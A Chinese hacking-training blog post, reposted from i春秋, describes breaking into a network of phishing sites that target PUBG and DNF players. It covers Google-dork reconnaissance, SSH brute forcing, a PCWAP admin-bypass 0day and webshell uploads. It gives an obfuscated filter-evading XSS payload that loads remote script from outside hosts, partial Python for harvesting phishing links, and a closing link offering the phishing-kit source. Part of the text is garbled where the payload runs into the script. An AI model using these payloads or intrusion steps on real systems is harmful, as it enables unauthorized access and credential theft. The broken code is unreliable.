当前位置:网站首页 > 黑客培训 > 正文

攻破黑市之拿下吃鸡,DNF钓鱼站群(结局彩蛋)

freebuffreebuf 2018-05-22 260 0

本文来源:i_春秋

i春秋作家:风在指尖


前段时间有个网友给我发了个网址,说找到个专门做钓鱼网站的连接,让我看看,然后就引出了下面的一系列事件

http://mfnyongshihuigui.jiebao8.top

网址如下


image.png


image.png

当时也没在意,有天闲着无聊就开干了,

直接打开 jiebao8.top

image.png

果然是钓鱼站 先对其进行一些信息搜集看看

http://www.jiebao8.top/robots.txt

image.png

对其用谷歌语法搜索,看看是否有以下漏洞,

1目录遍历漏洞  语法为: site:jiebao8.top intitle:index.of

2 配置文件泄露  语法为: site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | extra | ext:ini

3数据库文件泄露  site:jiebao8.top ext:sql | ext:dbf | ext:mdb

4日志文件泄露 site:jiebao8.top ext:log

5备份和历史文件 site:jiebao8.top ext:bkf | ext:bkp | ext:bak | extld | ext:backup

6SQL错误  site:jiebao8.top intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"

7公开文件信息  site:jiebao8.top ext:doc | ext:docx | extdt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv

8  phpinfo()  site:jiebao8.top ext:php intitle:phpinfo "published by the PHP Group" 

然而没查到什么 

将此域名放到情报分析里查看

https://x.threatbook.cn/domain/mfnyongshihuigui.jiebao8.top

发现IP地址一共有230个域名


谁没事会注册这么多域名,肯定拿来干坏事

  查询此IP162.247.96.114

开放端口:21(ftp),80,102(ssh),3306

对ssh端口进行爆破,无果~

对该域名进行CMS识别

http://www.yunsee.cn/

结果为 PCWAP

image.png

PCWAP一个小众的CMS系统,手里头刚好有个PCWAP的0day越权进后台查看信息

http://mfnyongshihuigui.jiebao8.top


image.png

修改文件上传类型,添加.php

image.png

image.png

然后我们上传图片LOGO,因为修改了上传类型,直接上传大马试试上传大马,小马,一句话


image.png

这里大概有20多个钓鱼网站,DNF,吃鸡的

尝试着提权,但是发现执行不了linux命令,可能禁止了


image.png

image.png

image.png

全部都是钓鱼站

我直接打包了所有源码,说实话,我很想对其进行代码审计,不过,我代码审计不是我的强项


image.png

而且种钓鱼网站我好像搞过,不过当时没盲打进去,现在拿下了源码,我肯定要试试这边的过滤规则

因为我本人不会代码审计,所以说拿到后台以后也只是凭着自己的经验模糊测试在提交账号密码时抓包

输入paylaod

image.png

image.png

后台看回显


image.png

c标签被成功执行,证明有XSS漏洞, 现在我们来进一步测试

paylaod为

image.png

image.png


发现页面被拦截,难道alert是危险字符?换个事件看看

payload:


image.png


image.png

成功弹窗,现在我们来开始构造xss paylaod

如果你之前看过我的文章,我发布过很多过狗的xss paylaod连接如下:https://bbs.ichunqiu.com/thread-31886-1-1.html

我们直接拿来用


svg/onload="[1].find(function(){with(`\docomen\.1\t\.1`);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

提交数据为

u=21312312svg/onload="[1].find(function(){with(`\docomen\.1\t\.1`);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4=">/object> b>GO-GO==>/b>select autofocus onfocus=\u0064ocument.write(String.fromCharCode(60,115,101,108,101,99,116,32,97,117,116,111,102,111,99,117,115,32,111,110,102,111,99,117,115,61,115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,80,116,39,41,59,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,99,61,39,47,47,119,119,119,46,48,50,49,108,97,111,100,111,110,103,102,97,46,99,111,109,47,101,47,55,46,50,46,106,115,39,62))> WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",

 

   'Accept-Language' : 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

 

   'Connection' : 'keep-alive',

 

   'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

 

   'X-Forwarded-For':'120.239.169.74'

 

}

 

#设置头部

 

proxies={

 

"http":"http://127.0.0.1:8080",

 

"https":"https://127.0.0.1:8080",

 

}

 

#设置代理

 

  

 

for i in range(0,200,10):  #根据百度的url设置搜索1-20页

 

bd_search="https://www.baidu.com/s?wd=幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏&pn=%s" % str(i)  #关键词搜索

 

r=requests.get(bd_search,headers=headers,verify=False,proxies=proxies,timeout=2)  #发起请求

 

f=open("1.html","a+",encoding="utf-8")  #把请求结果保存到1.html里

 

f.write(r.text)

 

f.close()

 

soup=BeautifulSoup(r.text,"lxml")

 

url_list=soup.select(".t > a")  #对请求回来的内容进行查找,找出a标签里(找出钓鱼链接)

 

for url in url_list:

 

real_url=url['href']  #遍历循环,并且打印

 

try:

 

r=requests.get(real_url,headers=headers,verify=False,proxies=proxies,timeout=2)  #再次请求

 

print(r.url)  #打印出钓鱼链接

 

f=open("exp.txt","a+",encoding="utf-8")

 

f.write(r.url+"\n")   #把查找到的钓鱼链接保存到exp.txt里

 

f.close()

 

except Exception as e:

 

print(e)



效果如下,找到的钓鱼链接

image.png

然后再批量渗透,自己也写了一个批量渗透钓鱼网站的脚本(不打算发,怕被人说我传播黑客工具。。。。)拿到的钓鱼网站大部分貌似都没什么账号密码 就看到这个吃鸡的钓鱼站


image.pngimage.png

我帮这位老兄删光了


image.png

一个钓鱼站大概一天上百个账号密码,不知道有多少人QQ是这样被盗的此次渗透,可能话比较多,各位别介意,这也是为了XSS基础比较薄弱的学友考虑~~嘿嘿~~~

结局彩蛋:
吃鸡钓鱼,DNF钓鱼源码也打包好了,链接:https://pan.baidu.com/s/1WR2V0SsTY8OrIoVxEW0SdA 

>>>点我得密码

转载请注明来自网盾网络安全培训,本文标题:《攻破黑市之拿下吃鸡,DNF钓鱼站群(结局彩蛋)》

标签:web安全

关于我

欢迎关注微信公众号

关于我们

网络安全培训,黑客培训,渗透培训,ctf,攻防

标签列表